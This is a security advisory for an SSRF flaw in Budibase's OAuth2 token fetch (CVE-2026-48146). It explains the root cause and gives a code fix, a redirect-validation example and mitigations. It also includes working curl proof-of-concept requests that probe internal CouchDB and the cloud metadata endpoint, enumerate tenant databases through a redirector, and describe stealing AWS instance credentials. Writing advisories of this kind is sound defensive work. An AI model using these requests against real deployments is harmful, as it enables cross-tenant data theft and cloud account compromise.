How CVE-2026-48146 Works
Budibase is an open-source low-code platform that provides OAuth2 authentication integration. The server includes an OAuth2 SDK with a `fetchToken` function in packages/server/src/sdk/workspace/oauth2/utils.ts. This function obtains access tokens (the proof of concept below uses the client_credentials grant) by making an outbound HTTP POST request to the configured provider's token endpoint.
The vulnerability arises because `fetchToken` uses a raw `node-fetch` call for this outbound request without applying the SSRF protection that is used consistently elsewhere in the codebase. Budibase has a central control, `blacklist.isBlacklisted()`, that blocks requests to private IP ranges: 127.0.0.0/8, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16. Every other outbound fetch path, including automation steps, plugin downloads, object store operations and outgoing webhooks, goes through either `blacklist.isBlacklisted()` or the `fetchWithBlacklist()` wrapper. The OAuth2 token fetch path bypasses all of these checks.
The Joi schema that validates the OAuth2 configuration URL imposes no scheme or host restrictions, so any string is accepted. Furthermore, the `fetchConfig` used by `fetchToken` leaves `redirect` at its node-fetch default of "follow", so even if a public URL is supplied initially, a 302 from that host can chain to an internal target, defeating any superficial validation of the submitted URL.
The most direct attack vector is the `/api/oauth2/validate` endpoint, which lives on `builderRoutes` and is accessible to any user with the BUILDER role. This endpoint accepts a URL in the request body, passes it to `fetchToken`, and returns a validation envelope that includes the upstream error string, which leaks fragments of the internal service's response back to the attacker.
Because the vulnerable path never consults the blacklist, an attacker with BUILDER privileges can point the OAuth2 token URL at internal services such as CouchDB (port 5984), the cloud metadata endpoint (169.254.169.254), or any other network-reachable internal resource. The Budibase server connects to the target and returns parts of the response body in the validation error message.
DailyCVE Form
Platform: Budibase
Version: prior to 3.39.0
Vulnerability: Server-Side Request Forgery (SSRF)
Severity: High (CVSS 7.7)
Date: May 27, 2026
Prediction: Fixed in 3.39.0
What Undercode Say: Analytics
The following analytics demonstrate the vulnerability’s reach and the code paths involved:
Blacklist Configuration (Bypassed)
```typescript
// packages/backend-core/src/blacklist/blacklist.ts:6-16
// Default blocked ranges:
// 127.0.0.0/8, 169.254.0.0/16, 10.0.0.0/8,
// 172.16.0.0/12, 192.168.0.0/16
```
Vulnerable fetchToken Implementation
```typescript
// packages/server/src/sdk/workspace/oauth2/utils.ts:17-65
// NO blacklist.isBlacklisted() call
// NO redirect: "manual" setting
const resp = await fetch(config.url, fetchConfig) // fetchConfig has redirect: "follow" (default)
```
Safe Outbound Fetch (Reference)
```typescript
// packages/backend-core/src/utils/outboundFetch.ts:98-100
// Sets redirect: "manual" and re-validates each hop
// Uses blacklist.isBlacklisted() before fetch
```
Route Validation (No Restrictions)
```typescript
// packages/server/src/api/routes/oauth2.ts:9
url: Joi.string().required() // No scheme or host validation
```
Proof of Concept – CouchDB Probe
```shell
curl -sS -b "$BUILDER_COOKIE" -X POST "$BASE/api/oauth2/validate" \
  -H "Content-Type: application/json" \
  -d '{"url":"http://127.0.0.1:5984/","clientId":"t","clientSecret":"t","method":"BODY","grantType":"client_credentials"}'
```
Response: `{"valid":false,"message":"Method Not Allowed"}`. The upstream status text is echoed back, which confirms that the server reached port 5984.
Proof of Concept – Cloud Metadata Probe
```shell
curl -sS -b "$BUILDER_COOKIE" -X POST "$BASE/api/oauth2/validate" \
  -H "Content-Type: application/json" \
  -d '{"url":"http://169.254.169.254/latest/meta-data/","clientId":"t","clientSecret":"t","method":"BODY","grantType":"client_credentials"}'
```
Response leaks: `invalid json response body ... reason: Unexpected token 'N', "Not Found"`
Database Enumeration via Redirector
```shell
# Enumerate all tenant databases on a shared CouchDB by bouncing through a public redirector
curl -sS -b "$BUILDER_COOKIE" -X POST "$BASE/api/oauth2/validate" \
  -H "Content-Type: application/json" \
  -d '{"url":"http://public-redirector.com/redirect?target=http://127.0.0.1:5984/_all_dbs","clientId":"t","clientSecret":"t","method":"BODY","grantType":"client_credentials"}'
```
How Exploit: Attack Vectors
Attack Vector 1: Cross-Tenant Data Exfiltration (Budibase Cloud)
On Budibase Cloud, multiple tenants share a single CouchDB instance on port 5984, with each tenant's data kept in separate databases named `app_<id>`. By pointing the OAuth2 token URL at `http://127.0.0.1:5984/_all_dbs` (directly, or via a 302 redirector should a direct loopback URL ever be filtered), an attacker can enumerate every tenant's databases. From there they can read `_users`, app definitions, and datasource configurations containing third-party credentials. None of this traffic passes through Budibase's tenant isolation layer.
Attack Vector 2: Cloud IAM Credential Theft
By setting the OAuth2 token URL to `http://169.254.169.254/latest/meta-data/iam/security-credentials/`, the attacker can retrieve the AWS instance role credentials associated with the Budibase server: that path lists the role name, and a second request to the role's own path returns the temporary keys. These credentials carry whatever AWS permissions the instance role holds, potentially enabling full cloud account compromise. On GCP the corresponding metadata path returns a cloud-platform scoped OAuth2 token, but the GCP metadata server only answers requests that carry the `Metadata-Flavor: Google` header, which this code path does not set, so token theft there is less direct than on AWS.
Attack Vector 3: Internal Network Enumeration
Self-hosted deployments face the same risks for CouchDB, Redis, MinIO, and any other service reachable from the Budibase pod or host network. The attack enables full internal network enumeration.
Exploit Requirements
- Valid Budibase account with BUILDER role privileges
- Network access to the Budibase server's `/api/oauth2/validate` endpoint
- No additional authentication or authorization checks beyond the BUILDER role
CVSS Score
- CVE-2026-48146: CVSS 3.1 Base Score 7.7 (High) — Vector: `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N`
- CVE-2026-48153: CVSS 3.1 Base Score 8.5 (High) — Vector: `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N`
Protection: From This CVE
Recommended Fix
Apply the SSRF protection pattern used elsewhere in the codebase by modifying `fetchToken` in packages/server/src/sdk/workspace/oauth2/utils.ts:
```typescript
import { blacklist } from "@budibase/backend-core"

async function fetchToken(config: { url: string; /* ... */ }) {
  config = await processEnvironmentVariable(config)

  // Add blacklist check: refuse loopback, link-local and RFC 1918 targets
  if (await blacklist.isBlacklisted(config.url)) {
    throw new Error("OAuth2 token URL is blocked.")
  }

  const fetchConfig: RequestInit = {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: new URLSearchParams({ grant_type: "client_credentials" }),
    redirect: "manual", // Critical: prevent redirect-based SSRF
  }
  // ...
}
```
With `redirect: "manual"` the provider's 3xx response is returned to `fetchToken` instead of being followed, so a redirector can no longer steer the request; the trade-off is that a legitimate provider whose token endpoint redirects will now fail validation. Alternatively, replace the raw `fetch` call with `fetchWithBlacklist()`, which performs the blacklist check and re-validates each redirect target hop by hop.
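The redirect-chain bypass described under "How CVE-2026-48146 Works" and the hop-by-hop re-validation that the recommended fix relies on, shown side by side as an added example. This is not Budibase code: the blocked ranges are the ones the advisory lists, while the synchronous `Transport` interface, the `MAX_HOPS` limit, the `demo()` helper and the fake network (redirector.example, a loopback CouchDB, idp.example) are assumptions made so the block runs offline.

```typescript
// Added example (not Budibase code): validate every hop of an outbound
// OAuth2 token request so a public redirector cannot bounce the server
// into CouchDB or the cloud metadata service. The blocked ranges are the
// advisory's; the Transport interface, MAX_HOPS and the fake network are
// assumptions for this example.

type HttpResponse = { status: number; headers: Record<string, string>; body: string };
// Synchronous stand-in for node-fetch with redirect: "manual"; the real
// call is async and the same loop applies with `await`.
type Transport = (url: string) => HttpResponse;

const BLOCKED_RANGES: Array<[string, number]> = [
  ["127.0.0.0", 8], ["169.254.0.0", 16], ["10.0.0.0", 8],
  ["172.16.0.0", 12], ["192.168.0.0", 16],
];
const MAX_HOPS = 5; // assumed limit; node-fetch's default is 20

function ipv4ToInt(ip: string): number | null {
  const parts = ip.split(".");
  if (parts.length !== 4) return null;
  let n = 0;
  for (const p of parts) {
    if (!/^\d{1,3}$/.test(p) || Number(p) > 255) return null;
    n = n * 256 + Number(p);
  }
  return n;
}

function inCidr(ip: number, base: string, bits: number): boolean {
  const mask = (0xffffffff << (32 - bits)) >>> 0;
  return ((ip & mask) >>> 0) === ((ipv4ToInt(base)! & mask) >>> 0);
}

function parseUrl(raw: string): URL | null {
  try { return new URL(raw); } catch (_e) { return null; }
}

// Returns a reason string when the URL must not be contacted, else null.
// WHATWG URL parsing normalises shorthand hosts (2130706433, 0x7f000001,
// 127.1) to dotted quads before the check. A hostname is passed as allowed
// here; real code must resolve it and check every address it yields.
function isBlockedTarget(rawUrl: string): string | null {
  const u = parseUrl(rawUrl);
  if (u === null) return "unparseable URL";
  if (u.protocol !== "http:" && u.protocol !== "https:") return `scheme ${u.protocol} not allowed`;
  const host = u.hostname;
  if (host === "localhost" || host.slice(-10) === ".localhost") return "localhost is blocked";
  if (host.indexOf(":") !== -1) return "IPv6 literal not allowed in this example";
  const ip = ipv4ToInt(host);
  if (ip === null) return null;
  for (const [base, bits] of BLOCKED_RANGES) {
    if (inCidr(ip, base, bits)) return `${host} is in ${base}/${bits}`;
  }
  return null;
}

// The unsafe shape: redirect: "follow" semantics, no check on any hop.
function fetchFollowingBlindly(startUrl: string, transport: Transport): HttpResponse {
  let current = startUrl;
  for (let hop = 0; hop <= MAX_HOPS; hop++) {
    const resp = transport(current);
    if (resp.status < 300 || resp.status > 399) return resp;
    current = new URL(resp.headers["location"] ?? "", current).toString();
  }
  throw new Error("too many redirects");
}

// The hardened shape: manual redirects, each hop checked before it is sent.
function fetchWithHopValidation(startUrl: string, transport: Transport): HttpResponse {
  let current = startUrl;
  for (let hop = 0; hop <= MAX_HOPS; hop++) {
    const reason = isBlockedTarget(current);
    if (reason !== null) throw new Error(`blocked at hop ${hop}: ${reason}`);
    const resp = transport(current);
    if (resp.status < 300 || resp.status > 399) return resp;
    const loc = resp.headers["location"];
    if (loc === undefined) throw new Error(`redirect without Location at hop ${hop}`);
    current = new URL(loc, current).toString(); // relative Location resolved against the current hop
  }
  throw new Error(`more than ${MAX_HOPS} redirects`);
}

// Constructed fake network: a public redirector, CouchDB on loopback and a
// legitimate identity provider. Nothing here touches the real network.
const fakeNetwork: Transport = (url) => {
  const u = new URL(url);
  if (u.hostname === "redirector.example") {
    return { status: 302, headers: { location: u.searchParams.get("target") ?? "/" }, body: "" };
  }
  if (u.hostname === "127.0.0.1" && u.port === "5984") {
    return { status: 200, headers: {}, body: '["_users","app_dev_example"]' };
  }
  if (u.hostname === "idp.example") {
    return { status: 200, headers: {}, body: '{"access_token":"t"}' };
  }
  return { status: 404, headers: {}, body: "Not Found" };
};

const REDIRECTOR_URL = "http://redirector.example/redirect?target=http://127.0.0.1:5984/_all_dbs";

// Runs both shapes against the redirector chain and returns what each produced.
function demo(): { blind: string; hardened: string } {
  const blind = fetchFollowingBlindly(REDIRECTOR_URL, fakeNetwork).body;
  let hardened: string;
  try {
    hardened = fetchWithHopValidation(REDIRECTOR_URL, fakeNetwork).body;
  } catch (e) {
    hardened = (e as Error).message;
  }
  return { blind, hardened };
}
```

`demo()` returns the CouchDB database listing for the blind fetch and `blocked at hop 1: 127.0.0.1 is in 127.0.0.0/8` for the validated one: the first hop (the public redirector) passes, the loopback target it redirects to is rejected before any request is sent. The check is deliberately run against the URL about to be fetched, not the one the user submitted, which is the whole point of `redirect: "manual"`.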
Mitigation for Unpatched Systems
1. Upgrade to Budibase 3.39.0 or newer.
2. Until the upgrade is possible:
- Restrict the BUILDER role so that only trusted administrators can modify OAuth2 configurations
- Use a network firewall or egress policy (or internal DNS policy) to prevent the Budibase server from reaching internal services and the metadata address 169.254.169.254
- On AWS, enforce IMDSv2 (HttpTokens=required); it needs a PUT to obtain a session token before any metadata read, which a single forged POST cannot perform
- Remove the ability to set OAuth2 token URLs entirely if not required
Impact
Confidentiality Impact: High
The vulnerability enables exfiltration of:
- Cloud instance identity credentials (AWS instance role keys, and the GCP or Azure equivalents where the metadata service can be reached), with whatever permissions the instance identity holds
- Cross-tenant data on Budibase Cloud, including other tenants’ app definitions, user databases, and datasource configurations containing third-party secrets
- Internal service data from CouchDB, Redis, MinIO, Kubernetes APIs, and other pods on the internal network
- Full internal network enumeration
Integrity Impact: Low to None (CVE-2026-48146) / Low (CVE-2026-48153)
The vulnerability is primarily read-only, though CVE-2026-48153 allows limited integrity impact.
Availability Impact: None
The vulnerability does not directly affect system availability.
Affected Environments
- All deployment types: AWS, GCP, Azure, bare-metal, Docker Compose, Kubernetes
- Budibase versions: All versions prior to 3.39.0
- Attackers: Any authenticated user with BUILDER role privileges
CVSS Summary
| Metric | CVE-2026-48146 | CVE-2026-48153 |
|---|---|---|
| Base Score | 7.7 (High) | 8.5 (High) |
| Attack Vector | Network | Network |
| Attack Complexity | Low | Low |
| Privileges Required | Low | Low |
| User Interaction | None | None |
| Scope | Changed | Changed |
| Confidentiality | High | High |
| Integrity | None | Low |
| Availability | None | None |
Found by aisafe.io
Sources:
Reported By: github.com